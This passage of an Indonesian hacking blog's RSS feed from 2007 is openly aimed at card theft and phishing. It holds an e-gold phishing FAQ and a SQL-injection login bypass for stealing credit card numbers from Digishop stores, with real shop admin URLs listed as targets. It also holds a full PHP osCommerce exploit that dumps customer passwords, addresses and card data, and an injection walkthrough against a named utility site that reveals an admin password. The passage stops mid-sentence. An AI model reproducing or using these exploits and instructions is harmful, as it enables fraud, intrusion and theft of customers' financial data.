windows, tapi koq error mulu?&lt;br /&gt;A:Cari saja paltform UNIX&lt;br /&gt;&lt;br /&gt;Q:Saya sudah menggunakan PHP Mailer yang bagus, tapi kenapa masih tidak masuk ke inbox saya?&lt;br /&gt;A:Pada beberapa kasus, e-mail palsu tersebut tidak masuk ke inbox karena memang sudah di-block oleh penyedia layanan e-mail (Google, Yahoo!, etc), sehingga anda harus mengganti gold-letter. Edit saja beberapa bagian dari gold-letter dan coba lagi. Tapi semoga gold-letter yang saya berikan belum di-block oleh penyedia layanan e-mail, jika iya, anda harus mencoba cari yang lain.&lt;br /&gt;&lt;br /&gt;Q:PHPMailer saya sudah masuk ke inbox, tapi beberapa setelah saya gunakan phpmailernya tdk bisa mengirim lagi, knp ya?&lt;br /&gt;A:Jika sudah digunakan untuk mengirim e-mail palsu apalagi dengan daftar korban yang cukup banyak, mungkin host-nya sudah masuk ke dalam blacklist, jadi silahkan cari yang lain.&lt;br /&gt;&lt;br /&gt;Q:Sudah dapat hasilnya, tapi informasi e-mail nya tidak ada, hanya login e-gold dan berhenti ketika e-gold meminta AccSent Pin, gimana?&lt;br /&gt;A:Di e-mail yang berisi E-gold Account Login ada informasi IP Address dan Browser. Saya juga sering mendapatkan yang demikian, kemudian saya meminta tolong teman yang mempunyai proxy list yang cukup banyak sehingga proxy-nya bisa digunakan untuk mem-by-pass accsent pin request. YahooID-nya adalah : acer_pira&lt;br /&gt;Semoga dia masih bisa membantu, tapi bila tidak, silahkan cari yang lain.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7712600665289475099-5496210780280152345?l=gresikblog.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://gresikblog.blogspot.com/2007/10/tutorial-phising-e-gold-account.html</link><author>noreply@blogger.com (gresikblog)</author><thr:total>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-7712600665289475099.post-7181416022289009819</guid><pubDate>Thu, 01 Nov 2007 03:27:00 +0000</pubDate><atom:updated>2007-10-31T20:28:45.921-07:00</atom:updated><title>Cari nomor Kartu Kredit dengan Bug Digishop</title><description>&lt;p&gt;1–] Buka Google&lt;/p&gt; &lt;p&gt;2–] Ketik inurl:&lt;em&gt;&lt;strong&gt;“/cart.php?m=”&lt;/strong&gt;&lt;/em&gt; [atau kreasi lo sendiri]&lt;/p&gt; &lt;p&gt;3–] Pilih salah satu target misalnya :&lt;br /&gt;http://uniquescrapbooks.com.au/store/cart.php?m=view.&lt;br /&gt;hapus tulisan cart.php?m= dengan admin.&lt;br /&gt;Jadinya http://uniquescrapbooks.com.au/store/admin&lt;br /&gt;4–] Nanti akan muncul menu login.&lt;br /&gt;Masukkan bug SQL Injection ini untuk Username dan Password&lt;br /&gt;Pada Username dan Password, isi dengan ‘or”=”&lt;/p&gt; &lt;p&gt;_________________&lt;br /&gt;Username :|_____’or”=”______|&lt;br /&gt;_________________&lt;br /&gt;Password :|_____’or”=”______|&lt;/p&gt; &lt;p&gt;5–] Klo berhasil, nanti akan muncul Main Menu dan silahkan cari CC nya. (udah sampe sini silahkan explorasi, jangan minta disuapin terus)&lt;br /&gt;Liat yang pending orders karena CC nya masih ada, kalau di pending orders CC nya udah ga ada berarti lo udah keduluan orang, he…he…he…&lt;/p&gt; &lt;p&gt;6–] Klo yang muncul Invalid Username or Password, berarti SQL&lt;br /&gt;Injection-nya udah ga mempan, he…he…he…silahkan cari&lt;br /&gt;yang lain.&lt;/p&gt; &lt;p&gt;—==[ Tips : - Klo` Lo dapet yang Order-an nya masih sedikit, targetnya di simpen aja dulu, mungkin beberapa hari kemudian udah ada CC baru (alias ada yg shopping)&lt;br /&gt;- Klo` dapet target bagus, jangan lupa bagi-bagi&lt;br /&gt;ya, he…he…he…&lt;/p&gt; &lt;p&gt;GOOD LUCK !&lt;/p&gt; &lt;p&gt;—==[ Contoh Target ]==—&lt;/p&gt; &lt;p&gt;&lt;em&gt;&lt;strong&gt;http://www.7footserb.com/shop/admin/&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt; &lt;p&gt;&lt;em&gt;&lt;strong&gt;https://www.tangerineclothing.com/admin/&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt; &lt;p&gt;&lt;em&gt;&lt;strong&gt;https://www.flagsbygm.com/store/admin/&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt; &lt;p&gt;&lt;em&gt;&lt;strong&gt;https://www.facesbyfelicia.com/store/admin/&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt; &lt;em&gt;&lt;strong&gt;http://creativecaketoppers.com/admin/&lt;/strong&gt;&lt;/em&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7712600665289475099-7181416022289009819?l=gresikblog.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://gresikblog.blogspot.com/2007/10/cari-nomor-kartu-kredit-dengan-bug.html</link><author>noreply@blogger.com (gresikblog)</author><thr:total>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-7712600665289475099.post-5493044803152820772</guid><pubDate>Thu, 01 Nov 2007 02:55:00 +0000</pubDate><atom:updated>2007-10-31T20:02:20.516-07:00</atom:updated><title>Cari CC dari osCommerce</title><description>&lt;span style="color:red;"&gt; Artikel ini hanya untuk pembelajaran saja untuk para webmaster. tidak ada yang berbahaya dalam artikel ini. Yang menjadikannya berbahaya adalah orang yang menggunakannya untuk kepentingan tidak baik saya tidak bertanggung jawab atas segala pengrusakan yang terjadi setelah anda membaca artikel ini&lt;/span&gt; &lt;hr /&gt;&lt;span style="font-family:MS Sans Serif, Arial, Helvetica;font-size:85%;"&gt;&lt;u&gt;&lt;span style="font-size:+2;color:#ff0000;"&gt;Cari CC dari osCommerce&lt;/span&gt;&lt;/u&gt;&lt;/span&gt;&lt;span style="font-family:MS Sans Serif, Arial, Helvetica;font-size:85%;"&gt;Dapatkan CC Info dari bug osCommerce&lt;/span&gt; &lt;p&gt;&lt;span style="font-family:MS Sans Serif, Arial, Helvetica;font-size:85%;"&gt;————– Exploit Code ————-&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style="font-family:MS Sans Serif, Arial, Helvetica;font-size:85%;"&gt;#!/usr/bin/php -q -d short_open_tag=on&lt;br /&gt;&lt;?&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style="font-family:MS Sans Serif, Arial, Helvetica;font-size:85%;"&gt;error_reporting(0);&lt;br /&gt;ini_set(”max_execution_time”,0);&lt;br /&gt;ini_set(”default_socket_timeout”,5);&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style="font-family:MS Sans Serif, Arial, Helvetica;font-size:85%;"&gt;if ($argc&lt;5) {&lt;br /&gt;echo ” Exploit osCommerce &lt; 2.2 Milestone 2 060817  “;&lt;br /&gt;echo ” Usage:      php “.$argv[0].” host path product_id whatinfo OPTIONS  “;&lt;br /&gt;echo ”   host - target server (ip/hostname) “;&lt;br /&gt;echo ”   path - path to osCommerce “;&lt;br /&gt;echo ”   product_id - Valid product_id “;&lt;br /&gt;echo ”   whatinfo - pass for password, cc for credit card info, addr for address  “;&lt;br /&gt;echo “Options:  “;&lt;br /&gt;echo ”   -D: Show debug or verbose on “;&lt;br /&gt;echo ”   -p[port]: specify a port other than 80 “;&lt;br /&gt;echo ”   -P[ip:port]: specify a proxy  “;&lt;br /&gt;echo “Example:  “;&lt;br /&gt;echo ”   php “.$argv[0].” localhost /os2/catalog/ 2 pass “;&lt;br /&gt;echo ”   php “.$argv[0].” 192.168.1.108 /os2/catalog/ 2 pass -p8080 -P192.168.1.108:3128 -D “;&lt;br /&gt;echo ”   php “.$argv[0].” 192.168.1.108 /os2/catalog/ 2 cc -p8080 -P192.168.1.108:3128 “;&lt;br /&gt;die;&lt;br /&gt;}&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style="font-family:MS Sans Serif, Arial, Helvetica;font-size:85%;"&gt;$host=$argv[1];&lt;br /&gt;$path=$argv[2];&lt;br /&gt;$products_id=$argv[3];&lt;br /&gt;$whatinfo=$argv[4];&lt;br /&gt;$port=80;&lt;br /&gt;$Debug=0;&lt;br /&gt;$proxy=”";&lt;br /&gt;for ($i=5; $i&lt;=$argc-1; $i++){&lt;br /&gt;$temp=$argv[$i][0].$argv[$i][1];&lt;br /&gt;if ($temp==”-p”)&lt;br /&gt;{&lt;br /&gt;$port=str_replace(”-p”,”",$argv[$i]);&lt;br /&gt;}&lt;br /&gt;if ($temp==”-P”)&lt;br /&gt;{&lt;br /&gt;$proxy=str_replace(”-P”,”",$argv[$i]);&lt;br /&gt;}&lt;br /&gt;if ($temp==”-D”)&lt;br /&gt;{&lt;br /&gt;$tmp=str_replace(”-D”,”",$argv[$i]);&lt;br /&gt;$Debug=1;&lt;br /&gt;}&lt;br /&gt;}&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style="font-family:MS Sans Serif, Arial, Helvetica;font-size:85%;"&gt;if (($path[0]&lt;&gt;´/´) or ($path[strlen($path)-1]&lt;&gt;´/´)) {echo ´Error… check the path!´; die;}&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style="font-family:MS Sans Serif, Arial, Helvetica;font-size:85%;"&gt;if($Debug==1) {&lt;br /&gt;echo “Name : osCommerce Multiple Vulnerabilities “;&lt;br /&gt;echo “Date : August 17, 2006 “;&lt;br /&gt;echo “Vendor : osCommerce “;&lt;br /&gt;echo “URL : http://www.oscommerce.com/ “;&lt;br /&gt;echo “Version : osCommerce &lt; 2.2 Milestone 2 060817 “;&lt;br /&gt;echo “Risk : Multiple Vulnerabilities “;&lt;br /&gt;echo “Exploit : Customers Info, Pass, and Credit Info Disclosure “;&lt;br /&gt;echo “Author : Perseus “;&lt;br /&gt;echo “Compatibility : magic_quotes_gpc off, union supported “;&lt;br /&gt;echo “Greets : rgod, James Bercegay, str0ke, hdm, r57  “;&lt;br /&gt;}&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style="font-family:MS Sans Serif, Arial, Helvetica;font-size:85%;"&gt;// try if you can rewrite this code to attack osc with magic_quotes_gpc on&lt;br /&gt;// because I found it impossible for the moment.&lt;br /&gt;// this will make oscommerce people update their vuln servers right now.&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style="font-family:MS Sans Serif, Arial, Helvetica;font-size:85%;"&gt;$proxy_regex = ´(d{1,3}.d{1,3}.d{1,3}.d{1,3}:d{1,5})´;&lt;br /&gt;if ($proxy==´´) {$p=$path;} else {$p=´http://´.$host.´:´.$port.$path;}&lt;br /&gt;$loop = 1000;&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style="font-family:MS Sans Serif, Arial, Helvetica;font-size:85%;"&gt;function sendpacketii($packet)&lt;br /&gt;{&lt;br /&gt;global $proxy, $host, $port, $html, $proxy_regex, $Debug;&lt;br /&gt;if ($proxy==´´) {&lt;br /&gt;if($Debug==1) echo ” Processing packets directly… “;&lt;br /&gt;$ock=fsockopen(gethostbyname($host),$port);&lt;br /&gt;if (!$ock) {&lt;br /&gt;echo ” No response from “.$host.”:”.$port.” “; die;&lt;br /&gt;}&lt;br /&gt;}&lt;br /&gt;else {&lt;br /&gt;$c = preg_match($proxy_regex,$proxy);&lt;br /&gt;if (!$c) {&lt;br /&gt;echo ´Not a valid proxy…´;die;&lt;br /&gt;}&lt;br /&gt;$parts=explode(´:´,$proxy);&lt;br /&gt;if($Debug==1) echo ” Processing packets using proxy “.$parts[0].”:”.$parts[1].” … “;&lt;br /&gt;$ock=fsockopen($parts[0],$parts[1]);&lt;br /&gt;if (!$ock) {&lt;br /&gt;echo ” No response from proxy… “;die;&lt;br /&gt;}&lt;br /&gt;}&lt;br /&gt;fputs($ock,$packet);&lt;br /&gt;if ($proxy==´´) {&lt;br /&gt;$html=´´;&lt;br /&gt;while (!feof($ock)) {&lt;br /&gt;$html.=fgets($ock);&lt;br /&gt;}&lt;br /&gt;}&lt;br /&gt;else {&lt;br /&gt;$html=´´;&lt;br /&gt;while ((!feof($ock)) or (!eregi(chr(0×0d).chr(0×0a).chr(0×0d).chr(0×0a),$html))) {&lt;br /&gt;$html.=fread($ock,1);&lt;br /&gt;}&lt;br /&gt;}&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style="font-family:MS Sans Serif, Arial, Helvetica;font-size:85%;"&gt;fclose($ock);&lt;br /&gt;#debug&lt;br /&gt;#echo ” “.$html;&lt;br /&gt;}&lt;br /&gt;$bl=0;&lt;br /&gt;for($y=0;$y&lt;=$loop;$y++) {&lt;br /&gt;//1. get cookie&lt;br /&gt;$out = “GET “.$p.”product_info.php?products_id=”.$products_id.” HTTP/1.1 “;&lt;br /&gt;$out .= “Host: “.$host.” “;&lt;br /&gt;$out .= “Connection: Close  “;&lt;br /&gt;sendpacketii($out);&lt;br /&gt;$e = explode(”Set-Cookie: osCsid=”,$html);&lt;br /&gt;$e2 = explode(”;”,$e[1]);&lt;br /&gt;$cookie = $e2[0];&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style="font-family:MS Sans Serif, Arial, Helvetica;font-size:85%;"&gt;//2. injection&lt;br /&gt;if($whatinfo==”pass”) {&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style="font-family:MS Sans Serif, Arial, Helvetica;font-size:85%;"&gt;$sql=”999´ UNION SELECT 0 , CONCAT( CHAR(77),´||||´, customers_password, ´^´, customers_email_address,´|´,customers_firstname,´|´,customers_lastname,´|´,customers_dob,´|´,customers_telephone, ´^´) , 0 , 0&lt;br /&gt;FROM customers LIMIT “.$y.”,1 /*”;&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style="font-family:MS Sans Serif, Arial, Helvetica;font-size:85%;"&gt;} elseif($whatinfo==”addr”) {&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style="font-family:MS Sans Serif, Arial, Helvetica;font-size:85%;"&gt;$sql=”999´ UNION SELECT 0 , CONCAT( CHAR(77),´||||´, entry_company, ´^´, entry_firstname,´|´,entry_lastname,´|´,entry_street_address,´|´,entry_suburb,´|´,entry_postcode,´|´,entry_city,´|´,entry_state, ´^´) , 0 , 0&lt;br /&gt;FROM address_book LIMIT “.$y.”,1 /*”;&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style="font-family:MS Sans Serif, Arial, Helvetica;font-size:85%;"&gt;} elseif($whatinfo==”cc”) {&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style="font-family:MS Sans Serif, Arial, Helvetica;font-size:85%;"&gt;$sql=”999´ UNION SELECT 0 , CONCAT( CHAR(77),´||||´, cc_type, ´^´, cc_owner,´|´,cc_number,´|´,cc_expires,´|´,billing_street_address,´|´,billing_suburb,´|´,billing_city,´|´,billing_postcode,´|´,billing_state,´|´,billing_country,´^´) , 0 , 0&lt;br /&gt;FROM orders LIMIT “.$y.”,1 /*”;&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style="font-family:MS Sans Serif, Arial, Helvetica;font-size:85%;"&gt;}&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style="font-family:MS Sans Serif, Arial, Helvetica;font-size:85%;"&gt;$sql=urlencode($sql);&lt;br /&gt;$data = “id[0]=”.$sql.”";&lt;br /&gt;$data.=”&amp;amp;products_id=”.$products_id.”";&lt;br /&gt;$out = “POST “.$p.”product_info.php?products_id=”.$products_id.”&amp;amp;action=add_product&amp;amp;osCsid=”.$cookie.” HTTP/1.0 “;&lt;br /&gt;$out .= “User-Agent: Googlebot/2.1 “;&lt;br /&gt;$out .= “Host: “.$host.” “;&lt;br /&gt;$out .= “Accept: text/plain “;&lt;br /&gt;$out .= “Connection: Close “;&lt;br /&gt;$out .= “Content-Type: application/x-www-form-urlencoded “;&lt;br /&gt;$out .= “Cookie: “.$cookie.” “;&lt;br /&gt;$out .= “Content-Length: “.strlen($data).”  “;&lt;br /&gt;$out .= $data;&lt;br /&gt;sendpacketii($out);&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style="font-family:MS Sans Serif, Arial, Helvetica;font-size:85%;"&gt;//3. get vals&lt;br /&gt;$out = “GET “.$p.”shopping_cart.php?osCsid=”.$cookie.” HTTP/1.1 “;&lt;br /&gt;$out .= “Host: “.$host.” “;&lt;br /&gt;$out .= “Connection: Close  “;&lt;br /&gt;sendpacketii($out);&lt;br /&gt;//echo $html;&lt;br /&gt;$e = explode(”M||||”,$html);&lt;br /&gt;$e2 = explode(”^”,$e[1]);&lt;br /&gt;$str = ” “.$y.”. “.$e2[0].” “.$e2[1].” “;&lt;br /&gt;echo $str;&lt;br /&gt;$strl = strlen($str);&lt;br /&gt;if($strl&lt;=25) $bl++;&lt;br /&gt;if($bl==3) break;&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style="font-family:MS Sans Serif, Arial, Helvetica;font-size:85%;"&gt;}&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style="font-family:MS Sans Serif, Arial, Helvetica;font-size:85%;"&gt;?&gt;&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style="font-family:MS Sans Serif, Arial, Helvetica;font-size:85%;"&gt;——- End Code ———–         &lt;/span&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7712600665289475099-5493044803152820772?l=gresikblog.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://gresikblog.blogspot.com/2007/10/cari-cc-dari-oscommerce.html</link><author>noreply@blogger.com (gresikblog)</author><thr:total>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-7712600665289475099.post-6033198485355551725</guid><pubDate>Thu, 01 Nov 2007 01:16:00 +0000</pubDate><atom:updated>2007-10-31T18:19:40.574-07:00</atom:updated><title>SQL Injection</title><description>/*********************************************************&lt;br /&gt; *                                  SQL Injection, step by                                  step.&lt;br /&gt; *&lt;br /&gt; * No Warranty. This                                  tutorial is for educational use only,                                 &lt;br /&gt; * commercial use is                                  prohibited.&lt;br /&gt; *&lt;br /&gt; **********************************************************/&lt;br /&gt;&lt;br /&gt;Akhir-akhir ini, anda sering mendengar istilah "SQL Injection" ?&lt;br /&gt;Anda tahu betapa berbahaya bug                                  yang satu ini ?&lt;br /&gt;Berikut akan kita sajikan                                  step by step SQL Injection ini.&lt;br /&gt;Catatan :                                  kita akan membatasi bahasan pada SQL Injection                                 &lt;br /&gt;di MS-SQL Server.&lt;br /&gt;&lt;br /&gt;Kita akan mengambil                                  contoh di site www.pln-wilkaltim.co.id&lt;br /&gt;Ada                                  dua kelemahan di site ini, yaitu:&lt;br /&gt;1. Tabel                                  News&lt;br /&gt;2. Tabel Admin&lt;br /&gt;&lt;br /&gt;Langkah pertama,                                  kita tentukan lubang mana yang bisa                                  di-inject&lt;br /&gt;dengan jalan berjalan-jalan                                  (enumeration) dulu di site tsb.&lt;br /&gt;Kita akan                                  menemukan 2 model cara input parameter, yaitu                                  dengan&lt;br /&gt;cara memasukkan lewat input box dan                                  memasukkannya lewat&lt;br /&gt;alamat URL.&lt;br /&gt;&lt;br /&gt;Kita                                  ambil yang termudah dulu, dengan cara input                                  box.&lt;br /&gt;Kemudian kita cari kotak login yang                                  untuk admin.&lt;br /&gt;Ketemu di                                  www.pln-wilkaltim.co.id/sipm/admin/admin.asp&lt;br /&gt;Langkah                                  pertama untuk menentukan nama tabel dan                                  fieldnya,&lt;br /&gt;kita inject kotak NIP dengan                                  perintah (password terserah, cabang&lt;br /&gt;biarkan                                  aja):&lt;br /&gt;' having 1=1--&lt;br /&gt;jangan lupa untuk                                  menuliskan tanda kutip tunggal dan                                  tanda&lt;br /&gt;minus dobel (penting).&lt;br /&gt;Arti kedua                                  tanda tsb bisa anda cari di tutorial SQL                                  Injection&lt;br /&gt;di www.neoteker.or.id ini (lihat                                  arsip sebelumnya).&lt;br /&gt;Kemudian akan keluar pesan                                  error:&lt;br /&gt;--------------------&lt;br /&gt;Microsoft OLE                                  DB Provider for ODBC Drivers                                  (0x80040E14)&lt;br /&gt;[Microsoft][ODBC SQL Server                                  Driver][SQL Server]Column&lt;br /&gt;'T_ADMIN.NOMOR' is                                  invalid in the select list because&lt;br /&gt;it is not                                  contained in an aggregate function and&lt;br /&gt;there                                  is no GROUP BY                                  clause.&lt;br /&gt;/sipm/admin/dologin.asp, line                                  7&lt;br /&gt;--------------------&lt;br /&gt;Keluarlah nama                                  field pertama kita !!!&lt;br /&gt;Catat nama tabel :                                  T_ADMIN&lt;br /&gt;Catat nama field :                                  NOMOR&lt;br /&gt;&lt;br /&gt;Kemudian kita akan mencari nama                                  field-field berikutnya,&lt;br /&gt;beserta nama tabel                                  yang mungkin berbeda-beda.&lt;br /&gt;Kita inject di                                  kotak NIP (password terserah):&lt;br /&gt;' group by                                  T_ADMIN.NOMOR having 1=1--&lt;br /&gt;Akan keluar pesan                                  error:&lt;br /&gt;--------------------&lt;br /&gt;Microsoft OLE                                  DB Provider for ODBC Drivers                                  (0x80040E14)&lt;br /&gt;[Microsoft][ODBC SQL Server                                  Driver][SQL Server]Column&lt;br /&gt;'T_ADMIN.NIP' is                                  invalid in the select list because&lt;br /&gt;it is not                                  contained in either an aggregate&lt;br /&gt;function or                                  the GROUP BY clause.&lt;br /&gt;/sipm/admin/dologin.asp,                                  line 7&lt;br /&gt;--------------------&lt;br /&gt;Artinya itulah                                  nama tabel dan field kedua kita.&lt;br /&gt;Catat :                                  T_ADMIN.NIP&lt;br /&gt;&lt;br /&gt;Kemudian kita cari field ke                                  tiga :&lt;br /&gt;' group by T_ADMIN.NOMOR,T_ADMIN.NIP                                  having 1=1--&lt;br /&gt;Akan keluar pesan                                  error:&lt;br /&gt;--------------------&lt;br /&gt;Microsoft OLE                                  DB Provider for ODBC Drivers                                  (0x80040E14)&lt;br /&gt;[Microsoft][ODBC SQL Server                                  Driver][SQL Server]Column&lt;br /&gt;'T_ADMIN.PASSWORD'                                  is invalid in the select list because&lt;br /&gt;it is                                  not contained in either an aggregate                                 &lt;br /&gt;function or the GROUP BY                                  clause.&lt;br /&gt;/sipm/admin/dologin.asp, line                                  7&lt;br /&gt;--------------------&lt;br /&gt;Catat field ke tiga                                  : T_ADMIN.PASSWORD&lt;br /&gt;&lt;br /&gt;Lakukan langkah di                                  atas sampai kita menemukan field                                  terakhir.&lt;br /&gt;&lt;br /&gt;Berikut adalah pesan error yang                                  terjadi, jika kita mengecek&lt;br /&gt;field terakhir                                  dengan meng-inject:&lt;br /&gt;' group by                                  T_ADMIN.NOMOR,T_ADMIN.NIP,T_ADMIN.PASSWORD,&lt;br /&gt;T_ADMIN.NAMA,T_ADMIN.KD_RANTING,T_ADMIN.ADDRESS,T_ADMIN.EMAIL                                 &lt;br /&gt;having 1=1--&lt;br /&gt;(catatan : kalimat harus 1                                  baris, tidak                                  dipotong)&lt;br /&gt;--------------------&lt;br /&gt;- NIP atau                                  Password atau Unit Anda salah !!                                    -&lt;br /&gt;--------------------&lt;br /&gt;Sukses !!! Kita                                  berhasil menemukan field terakhir.&lt;br /&gt;Daftar                                  kolom (field):&lt;br /&gt;T_ADMIN.NOMOR&lt;br /&gt;T_ADMIN.NIP                                 &lt;br /&gt;T_ADMIN.PASSWORD&lt;br /&gt;T_ADMIN.NAMA                                 &lt;br /&gt;T_ADMIN.KD_RANTING&lt;br /&gt;T_ADMIN.ADDRESS                                 &lt;br /&gt;T_ADMIN.EMAIL&lt;br /&gt;Hanya ada satu tabel untuk                                  otentifikasi ini (yaitu T_ADMIN),&lt;br /&gt;ini akan                                  mempermudah proses kita                                  selanjutnya.&lt;br /&gt;&lt;br /&gt;Langkah berikutnya, kita                                  menentukan jenis struktur field-&lt;br /&gt;field                                  tersebut di atas.&lt;br /&gt;&lt;br /&gt;Kita inject di kotak                                  NIP (pass terserah) :&lt;br /&gt;' union select                                  sum(NOMOR) from T_ADMIN--&lt;br /&gt;Arti dari query                                  tersebut adalah : kita coba menerapkan&lt;br /&gt;klausa                                  sum sebelum menentukan apakah jumlah                                  kolom-kolom&lt;br /&gt;di dua rowsets adalah                                  sejenis.&lt;br /&gt;Bahasa mudahnya adalah kita                                  memasukkan klausa sum (jumlah)&lt;br /&gt;yang berlaku                                  untuk type kolom numerik, jadi untuk type                                  kolom&lt;br /&gt;yang bukan numerik, akan keluar error                                  yang bisa memberitahu&lt;br /&gt;kita jenis kolom yang                                  dimaksud.&lt;br /&gt;Pesan error                                  :&lt;br /&gt;--------------------&lt;br /&gt;Microsoft OLE DB                                  Provider for ODBC Drivers                                  (0x80040E14)&lt;br /&gt;[Microsoft][ODBC SQL Server                                  Driver][SQL Server]All queries&lt;br /&gt;in an SQL                                  statement containing a UNION operator must have                                 &lt;br /&gt;an equal number of expressions in their                                  target lists.&lt;br /&gt;/sipm/admin/dologin.asp, line                                  7&lt;br /&gt;--------------------&lt;br /&gt;artinya kolom NOMOR                                  berjenis numerik.&lt;br /&gt;&lt;br /&gt;Berikutnya kita inject                                  :&lt;br /&gt;' union select sum(NIP) from                                  T_ADMIN--&lt;br /&gt;Akan keluar pesan error                                  :&lt;br /&gt;--------------------&lt;br /&gt;Microsoft OLE DB                                  Provider for ODBC Drivers                                  (0x80040E07)&lt;br /&gt;[Microsoft][ODBC SQL Server                                  Driver][SQL Server]The sum&lt;br /&gt;or average                                  aggregate operation cannot take a char data                                 &lt;br /&gt;type as an                                  argument.&lt;br /&gt;/sipm/admin/dologin.asp, line                                  7&lt;br /&gt;--------------------&lt;br /&gt;Artinya kolom NIP                                  bertype char.&lt;br /&gt;&lt;br /&gt;Kita harus mengulang                                  perintah di atas untuk kolom yang&lt;br /&gt;berikutnya                                  dengan jalan mengganti nama_kolom di :&lt;br /&gt;'                                  union select sum(nama_kolom) from                                  T_ADMIN--&lt;br /&gt;dengan kolom yang                                  berikutnya.&lt;br /&gt;Kita peroleh 7 type                                  kolom:&lt;br /&gt;T_ADMIN.NOMOR =&gt;                                  numeric&lt;br /&gt;T_ADMIN.NIP =&gt;                                  char&lt;br /&gt;T_ADMIN.PASSWORD =&gt;                                  nvarchar&lt;br /&gt;T_ADMIN.NAMA =&gt;                                  char&lt;br /&gt;T_ADMIN.KD_RANTING =&gt;                                  char&lt;br /&gt;T_ADMIN.ADDRESS =&gt;                                  nvarchar&lt;br /&gt;T_ADMIN.EMAIL =&gt;                                  char&lt;br /&gt;&lt;br /&gt;Langkah berikutnya, kita akan                                  mencari isi kolom password,&lt;br /&gt;untuk user admin,                                  dengan meng-inject :&lt;br /&gt;' union select min(NAMA),1,1,1,1,1,1 from T_ADMIN where NAMA &gt; 'a'--&lt;br /&gt;artinya kita memilih minimum nama                                  user yang lebih besar dari 'a'&lt;br /&gt;dan mencoba                                  meng-konvert-nya ke tipe integer.&lt;br /&gt;Arti angka 1 sebanyak 6 kali itu adalah bahwa kita hanya memilih&lt;br /&gt;kolom NAMA, dan mengabaikan 6 kolom                                  yang lain.&lt;br /&gt;Akan keluar pesan error                                  :&lt;br /&gt;--------------------&lt;br /&gt;Microsoft OLE DB                                  Provider for ODBC Drivers                                  (0x80040E07)&lt;br /&gt;[Microsoft][ODBC SQL Server                                  Driver][SQL Server]Syntax&lt;br /&gt;error converting                                  the varchar value 'bill ' to&lt;br /&gt;a column of                                  data type int.&lt;br /&gt;/sipm/admin/dologin.asp, line                                  7&lt;br /&gt;--------------------&lt;br /&gt;Anda lihat                                  :&lt;br /&gt;varchar value 'bill '&lt;br /&gt;'bill' itu adalah nama user di record yang terakhir dimasukkan,&lt;br /&gt;atau isi kolom NAMA di record                                  yang terakhir dimasukkan.&lt;br /&gt;&lt;br /&gt;Selanjutnya                                  kita inject :&lt;br /&gt;' union select                                  min(PASSWORD),1,1,1,1,1,1 from T_ADMIN where                                 &lt;br /&gt;NAMA = 'bill'--&lt;br /&gt;catatan : harus sebaris                                  (tidak dipotong).&lt;br /&gt;Akan keluar error                                  :&lt;br /&gt;---------------------&lt;br /&gt;Microsoft OLE DB                                  Provider for ODBC Drivers                                  (0x80040E07)&lt;br /&gt;[Microsoft][ODBC SQL Server                                  Driver][SQL Server]Syntax&lt;br /&gt;error converting                                  the nvarchar value 'm@mpusk@u' to a&lt;br /&gt;column                                  of data type int.&lt;br /&gt;/sipm/admin/dologin.asp,                                  line 7&lt;br /&gt;---------------------&lt;br /&gt;Artinya kita                                  berhasil !!!&lt;br /&gt;Kita dapatkan&lt;br /&gt;[+] NAMA =                                  bill&lt;br /&gt;[+] PASSWORD = m@mpusk@u&lt;br /&gt;&lt;br /&gt;Silahkan                                  login ke                                  :&lt;br /&gt;www.pln-wilkaltim.co.id/sipm/admin/admin.asp&lt;br /&gt;dengan                                  account di atas, sedang nama cabang, silahkan                                  anda&lt;br /&gt;isi sendiri dengan cara coba-coba                                 &lt;br /&gt;&lt;br /&gt;Atau kita pakai jalan pintas                                  saja....&lt;br /&gt;&lt;br /&gt;Kita inject-kan :&lt;br /&gt;' union                                  select min(KD_RANTING),1,1,1,1,1,1 from T_ADMIN                                 &lt;br /&gt;where NAMA ='bill'--&lt;br /&gt;catatan : harus satu                                  baris.&lt;br /&gt;Duarrrrrr..........&lt;br /&gt;Glhodhak.............&lt;br /&gt;Langsung                                  masuk ke menu admin.&lt;br /&gt;Ingat : jangan buat                                  kerusakan ! beritahu sang admin                                  !!!&lt;br /&gt;&lt;br /&gt;Lubang ke dua adalah pada bagian                                  berita.&lt;br /&gt;Pada dasarnya berita di situ adalah                                  isi dari tabel yang&lt;br /&gt;lain lagi. Jadi tetep                                  bisa kita inject !!!&lt;br /&gt;Bedanya, kita harus                                  